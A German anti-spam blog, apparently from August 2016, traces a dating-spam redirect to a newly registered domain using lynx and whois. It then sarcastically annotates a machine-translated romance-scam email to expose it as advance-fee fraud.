Wer ein grundsätzliches Interesse an der „Diversifizierung“ von Online-Betrügerbanden hat¹, halte hier kurz fest, dass sich wieder einmal zeigt, dass der illegale und in Einzelfällen lebensgefährliche Handel mit gefälschten Medikamenten von der gleichen spammenden Bande vorangetrieben wird wie das Affiliate-Geschäft mit dem Dating-Betrug. Aber das habe ich ja schon vor ein paar Tagen mitgeteilt, wenn auch mit deutlich weniger Indizien.

So weit, so schlecht.

Um mal zu sehen, wo die Reise mit angehängter ID hingeht – Leute, die auf den Köder dieser Spam reingefallen sind, wollen ja gewiss keine Pimmelpillen kaufen, sondern ein erregendes Video sehen – habe ich mal ein paar Zeichen in der originalen ID aus der Spam verändert²:

$ lynx -mime_header http://www.server213.win/25_1h3Oy1a7un8t/ | sed '/^\s*$/q'
HTTP/1.1 301 Moved Permanently
Date: Sat, 06 Aug 2016 10:25:08 GMT
Server: Apache/2.4.10 (Debian)
Location: http://www.whats-xxx.com/
Connection: close
Content-Length: 52
Content-Type: text/html; charset=UTF-8

$ _

Die Domain whats (strich) xxx (punkt) com ist ganz frisch und unverbraucht…

$ whois whats-xxx.com | grep '^Creation'
Creation Date: 2016-06-30T13:23:00.00Z
$ _

…sie wurde gerade erst vor etwas mehr als einem Monat eingerichtet. Was einem dort anschaut, ist dann eine Vul… ähm… wieder einmal das schon aus dem letzten Jahr bekannte WhatsFuck-Design der Dating-Spammer. Nichts wurde daran verändert. Der schwarze Balken über den einladend präsentierten Leibespforten im Screenshot ist natürlich von mir, und ich gehe davon aus, dass dieses Foto von irgendwo aus dem Internet „mitgenommen“ wurde… die Frau tut mir leid. Das einzige, was sich geändert hat, ist die für den Beschiss verwendete Domain. Vermutlich stehen die zuvor von diesen Gangstern verwendeten Domains inzwischen auf jeder Blacklist dieser Welt.

Natürlich wurde auch diese neue Domain über einen Dienstleister aus dem sonnigen Panama anonym registriert.

Gruß
Deine Vivien-Maus

Nee, Vivi, wenn du wirklich meine „Nachbarin“ wärest, dann brauchten wir keinen Dating-Betrug, der von Affiliate-Lumpenkaufleuten vertrieben wird, sondern du könntest einfach zu mir rüberkommen. Ich treibe es aber nur im Schlamm…

¹Das ist eine gute Gelegenheit, mal meine treuen Mitleser im Niedersächsischen Landeskriminalamt zu grüßen! Ich wünsche euch von ganzem Herzen viel Erfolg! Wer das Ziel hat, Spammer dingfest zu machen, hat den gleichen Feind wie ich, und das überbrückt viele Differenzen…

²Wer sich über die Pipe auf sed wundert: Ich lösche damit alles, was nach der ersten Leerzeile kommt, so dass ich für das Zitat nur die Header habe. Ansonsten würde der komplette HTML-Quelltext einer eventuellen Webseite ausgegeben, der mich in diesem Kontext zunächst nicht interessiert.

Charmant und nettes Madchen wird auf eine Antwort von Ihnen warten!

Samstag, 6. August 2016

Oh, ich habe aber lange keinen Liebesbrief mehr bekommen…

Von: Ich mochte die andere Halfte zu finden. <bwallace (at) arksysinc (punkt) com>

Oh, du schreibst bestimmt Qualitätsdeutsch. Mal lesen:

Guten Abend.

Wir haben es gerade so 13:30 Uhr. Da sagt man in meinem Umfeld noch „Guten Morgen“. 😀

Wie geht es dir?

Ach, eigentlich ganz gut, ich spüre nur leichte Übelkeit wegen deiner Spam.

Wie ist deine Stimmung?

Noch ist sie gut.

Ich wollte dich besser erkennen.

Versuch es mal beim Augenarzt!

Ich suche den Mann online fur die langfristigen Beziehungen. Ich habe die erwachsenen Lebensauffassungen. Ich die einsame Frau, und ich habe keine Kinder.

Das finde ich schön, dass du deinen zukünftigen Gesponsen über Spam suchst. So wächst zusammen, was zusammen gehört: Dummheit und Kriminalität.

Ich bin Marina.

Ich bin Elias. Mein Name stimmt. Deiner nicht. Und du warst zu faul, mal meinen Namen nachzuschauen, bevor du mir deine Spam in das Postfach kötteltest.

Ich bin freundschaftlich und friedlich Madchen.

Du bist so freundschaftlich und friedlich wie eine kriminelle Bande, die mit Spam nach naiven Opfern für einen Vorschussbetrug sucht.

Ach, übrigens Marinchen: Frag doch mal das nächste achtjährige Hackkind, wie man diese Umlaute in eine Mail kriegt! Es ist wirklich nicht so schwierig. Ach, wenn du dir Mühe geben wolltest, würdest du ja nicht spammen, sondern könntest gleich arbeiten gehen? Nun, so hört sich deine von irgendeiner Software aus dem Russischen ins Deutsche übersetzte Spam auch an, wenn man sie laut liest.

Ich glaube, dass Sie nicht der vulgare Person.

Mein Kommentar zu dieser Aussage ist aus Jugendschutzgründen zensiert…

Und Sie wirst die nackten Foto nicht erbitten.

Nee, ich nehme nur Fotos von nackten Menschen.

Ich denke, dass Sie der ehrliche Person.

Interessant, was für eine Tätigkeit du als „Denken“ bezeichnest.

Wenn Sie unsere Bekanntschaft unterstutzen wirst,
so werde ich Ihnen ausfuhrlicher von mir erzahlen.

Oh, toll: Wenn man dir antwortet, gibt es noch mehr Lügen. Für alle, die gar nicht genug davon kriegen können. Und damit du deine Lügen auch schön opfergerecht erzählst, auf dass Geld für allerlei Dinge lockergemacht und über Western Union an dich und deine Bande überwiesen werde, möchtest du erstmal etwas über dein Opfer wissen:

Mir ware es wunschenswert, dass du ausfuhrlicher von dir auch erzahlt hast. Wie heissen Sie? Wo kommst du her? Was ist Ihr Alter? Ich will Ihre Foto sehen. Bitte, sende mir Ihre Foto.

Echt jetzt: Du weißt gar nix von mir, aber willst mit mir „die langfristigen Beziehungen“ haben.

Na gut, ein nichtnacktes Foto von mir sollst du gern haben. 😀

Ich werde Ihre Antwort mit Ungeduld warten. Deine neue Freundin Marina.

Wenn du meine Freundin bist, dann gruselts mir erst so richtig vor meinen richtigen Feinden…

Oh, da hängen ja auch noch zwei Fotos an der Spam:

Erstes angehängtes Foto

Zweites angehängtes Foto

So eine entzückend anzuschauende Frau und doch so herzzerreißend ledig, dass sie Verzweiflungsspams schickt! Das ist kaum zu glauben… am besten, man glaubt es auch einfach nicht. Die beiden Fotos wurden irgendwo im Internet mitgenommen, und die dort abgebildete Frau, deren Anblick jetzt als Köder für Kriminelle dient, tut mir leid.

Wer irgendwelche Social-Media-Dienste mit persönlichen Fotos flutet, sollte ruhig mal darüber nachdenken, wo diese Fotos wieder „herauskommen“ können. Ich glaube, dass solche „Zweitverwertungen“ durch Betrügerbanden von niemanden gewünscht sein können, der seine Sinne noch beieinander hat.